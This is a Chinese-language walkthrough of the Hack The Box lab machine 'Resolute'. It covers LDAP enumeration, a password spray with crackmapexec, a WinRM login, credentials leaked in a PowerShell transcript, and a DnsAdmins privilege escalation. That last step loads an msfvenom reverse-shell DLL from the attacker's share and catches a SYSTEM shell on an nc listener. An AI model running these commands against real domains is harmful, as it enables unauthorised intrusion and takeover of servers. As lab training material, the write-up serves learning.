打靶记录(一四四)之HTBResolute

端口扫描

┌──(mikannse㉿kali)-[~/HTB/resolute]
└─$ sudo nmap --min-rate=10000 -p- 10.10.10.169
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-13 19:33 CST
Warning: 10.10.10.169 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.169
Host is up (0.071s latency).
Not shown: 65474 closed tcp ports (reset), 37 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49671/tcp open  unknown
49680/tcp open  unknown
49681/tcp open  unknown
49688/tcp open  unknown
49712/tcp open  unknown
50013/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 17.38 seconds

┌──(mikannse㉿kali)-[~/HTB/resolute]
└─$ sudo nmap -sT -sC -sV -O -p53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49671,49680,49681,49688,49712,50052 10.10.10.169
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-13 19:38 CST
Nmap scan report for 10.10.10.169
Host is up (0.074s latency).

PORT      STATE  SERVICE      VERSION
53/tcp    open   domain       Simple DNS Plus
88/tcp    open   kerberos-sec Microsoft Windows Kerberos (server time: 2024-09-13 11:34:43Z)
135/tcp   open   msrpc        Microsoft Windows RPC
139/tcp   open   netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open   ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp   open   microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp   open   kpasswd5?
593/tcp   open   ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open   tcpwrapped
3268/tcp  open   ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp  open   tcpwrapped
5985/tcp  open   http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open   mc-nmf       .NET Message Framing
47001/tcp open   http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open   msrpc        Microsoft Windows RPC
49665/tcp open   msrpc        Microsoft Windows RPC
49666/tcp open   msrpc        Microsoft Windows RPC
49667/tcp open   msrpc        Microsoft Windows RPC
49671/tcp open   msrpc        Microsoft Windows RPC
49680/tcp open   ncacn_http   Microsoft Windows RPC over HTTP 1.0
49681/tcp open   msrpc        Microsoft Windows RPC
49688/tcp open   msrpc        Microsoft Windows RPC
49712/tcp open   msrpc        Microsoft Windows RPC
50052/tcp closed unknown
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=9/13%OT=53%CT=50052%CU=42043%PV=Y%DS=2%DC=I%G=Y%TM=
OS:66E42469%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10D%TI=I%CI=I%II=I%S
OS:S=S%TS=A)SEQ(SP=104%GCD=1%ISR=10D%TI=I%CI=RD%II=I%SS=S%TS=A)OPS(O1=M53CN
OS:W8ST11%O2=M53CNW8ST11%O3=M53CNW8NNT11%O4=M53CNW8ST11%O5=M53CNW8ST11%O6=M
OS:53CST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)ECN(R=Y%DF=Y
OS:%T=80%W=2000%O=M53CNW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=
OS:)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A
OS:=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF
OS:=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=
OS:%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%
OS:IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)

Network Distance: 2 hops
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
|_clock-skew: mean: 2h16m35s, deviation: 4h02m32s, median: -3m26s
| smb2-time: 
|   date: 2024-09-13T11:35:43
|_  start_date: 2024-09-13T11:22:15
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Resolute
|   NetBIOS computer name: RESOLUTE\x00
|   Domain name: megabank.local
|   Forest name: megabank.local
|   FQDN: Resolute.megabank.local
|_  System time: 2024-09-13T04:35:46-07:00
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.73 seconds

找到域名:megabank.local

Enum

┌──(mikannse㉿kali)-[~/HTB/resolute]
└─$ dig any @10.10.10.169 megabank.local 

; <<>> DiG 9.20.1-1-Debian <<>> any @10.10.10.169 megabank.local
; (1 server found)
;; global options: +cmd
;; Got answer:
;; WARNING: .local is reserved for Multicast DNS
;; You are currently testing what happens when an mDNS query is leaked to DNS
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 6199
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 4, AUTHORITY: 0, ADDITIONAL: 2

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;megabank.local.                        IN      ANY

;; ANSWER SECTION:
megabank.local.         600     IN      A       10.10.10.169
megabank.local.         3600    IN      NS      resolute.megabank.local.
megabank.local.         3600    IN      SOA     resolute.megabank.local. hostmaster.megabank.local. 152 900 600 86400 3600
megabank.local.         600     IN      AAAA    dead:beef::b803:885a:b665:b183

;; ADDITIONAL SECTION:
resolute.megabank.local. 3600   IN      A       10.10.10.169

;; Query time: 71 msec
;; SERVER: 10.10.10.169#53(10.10.10.169) (TCP)
;; WHEN: Fri Sep 13 19:46:42 CST 2024
;; MSG SIZE  rcvd: 173

似乎没有可以连接的smb共享，说明还需要进一步的枚举，尝试枚举用户名。

一开始用的kerbrute,但是字典有点大，跑的有些慢，尝试用ldap来枚举

┌──(mikannse㉿kali)-[~/tools/domain/windapsearch]
└─$ python windapsearch.py -d megabank.local --dc-ip 10.10.10.169 -U >ldapresult
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.10.10.169
[+] Getting defaultNamingContext from Root DSE
[+]     Found: DC=megabank,DC=local
[+] Attempting bind
[+]     ...success! Binded as: 
[+]      None

[+] Enumerating all AD users
[+]     Found 25 users: 

cn: Guest

cn: DefaultAccount

cn: Ryan Bertrand
userPrincipalName: ryan@megabank.local

cn: Marko Novak
userPrincipalName: marko@megabank.local

cn: Sunita Rahman
userPrincipalName: sunita@megabank.local

cn: Abigail Jeffers
userPrincipalName: abigail@megabank.local

cn: Marcus Strong
userPrincipalName: marcus@megabank.local

cn: Sally May
userPrincipalName: sally@megabank.local

cn: Fred Carr
userPrincipalName: fred@megabank.local

cn: Angela Perkins
userPrincipalName: angela@megabank.local

cn: Felicia Carter
userPrincipalName: felicia@megabank.local

cn: Gustavo Pallieros
userPrincipalName: gustavo@megabank.local

cn: Ulf Berg
userPrincipalName: ulf@megabank.local

cn: Stevie Gerrard
userPrincipalName: stevie@megabank.local

cn: Claire Norman
userPrincipalName: claire@megabank.local

cn: Paulo Alcobia
userPrincipalName: paulo@megabank.local

cn: Steve Rider
userPrincipalName: steve@megabank.local

cn: Annette Nilsson
userPrincipalName: annette@megabank.local

cn: Annika Larson
userPrincipalName: annika@megabank.local

cn: Per Olsson
userPrincipalName: per@megabank.local

cn: Claude Segal
userPrincipalName: claude@megabank.local

cn: Melanie Purkis
userPrincipalName: melanie@megabank.local

cn: Zach Armstrong
userPrincipalName: zach@megabank.local

cn: Simon Faraday
userPrincipalName: simon@megabank.local

cn: Naoki Yamamoto
userPrincipalName: naoki@megabank.local


[*] Bye!

导出成一个用户字典

┌──(mikannse㉿kali)-[~/HTB/resolute]
└─$ cat ldapsult |grep userPrincipalName |awk -F ' ' '{print $2}' |awk -F '@' '{print $1}' >username

用–full，能够展示所有的属性，那就导出用户的所有属性

┌──(mikannse㉿kali)-[~/tools/domain/windapsearch]
└─$ python windapsearch.py -d megabank.local --dc-ip 10.10.10.169 -U --full |grep Password
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 133707043313373976
description: Account created. Password set to Welcome123!

找到了初始默认密码:Welcome123!,进行一个密码喷洒

Password Spray

┌──(mikannse㉿kali)-[~/HTB/resolute]
└─$ crackmapexec smb 10.10.10.169 -u username -p pass --continue-on-success                
SMB         10.10.10.169    445    RESOLUTE         [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\ryan:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\marko:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\sunita:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\abigail:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\marcus:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\sally:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\fred:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\angela:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\felicia:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\gustavo:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\ulf:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\stevie:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\claire:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\paulo:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\steve:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\annette:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\annika:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\per:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\claude:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [+] megabank.local\melanie:Welcome123! 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\zach:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\simon:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\naoki:Welcome123! STATUS_LOGON_FAILURE

melanie:Welcome123!

┌──(mikannse㉿kali)-[~/HTB/resolute]
└─$ evil-winrm -i 10.10.10.169 -u 'melanie' -p 'Welcome123!' 
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine                                                                   
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion                                                                                     
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\melanie\Documents> 

提权

没有什么特殊的组和权限，跑一下winpeas,在结果中看到一个powershell的可疑路径

Time Running: 0:15
==|| PowerShell Registry Transcript Check


    Hive: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell


Name                           Property
----                           --------
Transcription                  EnableTranscripting    : 0
                               OutputDirectory        : C:\PSTranscipts
                               EnableInvocationHeader : 0

*Evil-WinRM* PS C:\PSTranscripts> cmd /c dir /a
 Volume in drive C has no label.
 Volume Serial Number is D1AC-5AF6

 Directory of C:\PSTranscripts

12/03/2019  07:32 AM    <DIR>          .
12/03/2019  07:32 AM    <DIR>          ..
12/03/2019  07:45 AM    <DIR>          20191203
               0 File(s)              0 bytes
               3 Dir(s)   2,461,622,272 bytes free

存在一个隐藏目录20191203

*Evil-WinRM* PS C:\PSTranscripts\20191203> cmd /c dir /a
 Volume in drive C has no label.
 Volume Serial Number is D1AC-5AF6

 Directory of C:\PSTranscripts\20191203

12/03/2019  07:45 AM    <DIR>          .
12/03/2019  07:45 AM    <DIR>          ..
12/03/2019  07:45 AM             3,732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
               1 File(s)          3,732 bytes
               2 Dir(s)   2,461,622,272 bytes free

*Evil-WinRM* PS C:\PSTranscripts\20191203> type PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
**********************
Windows PowerShell transcript start
Start time: 20191203063201
<SNIP>
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!

<SNIP>

泄露了一个服务器上的共享以及ryan用户的密码，再次远程连接

whoami /groups看一下，发现ryan是域的DNSadmin组成员,可以加载任意dll

https://book.hacktricks.xyz/v/cn/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges

可以生成一个dll来做一个反弹shell

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.13 LPORT=443 -f dll -o rev.dll

*Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd Resolute /config /serverlevelplugindll \\10.10.14.13\share\rev.dll

Registry property serverlevelplugindll successfully reset.
Command completed successfully.

*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe \\resolute stop dns

SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 3  STOP_PENDING
                                (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe \\resolute start dns

SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 2  START_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x7d0
        PID                : 3416
        FLAGS              :

┌──(mikannse㉿kali)-[~/HTB/resolute]
└─$ rlwrap -cAr nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.169] 56664
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Users\Administrator\Desktop>whoami
whoami
nt authority\system

这里卡了还是比较久的，上传到机器上似乎是不会执行的，也许是因为有Defender

碎碎念

还算是比较简单的房间，其实路径都是比较明显的。ldap枚举还是比较新的东西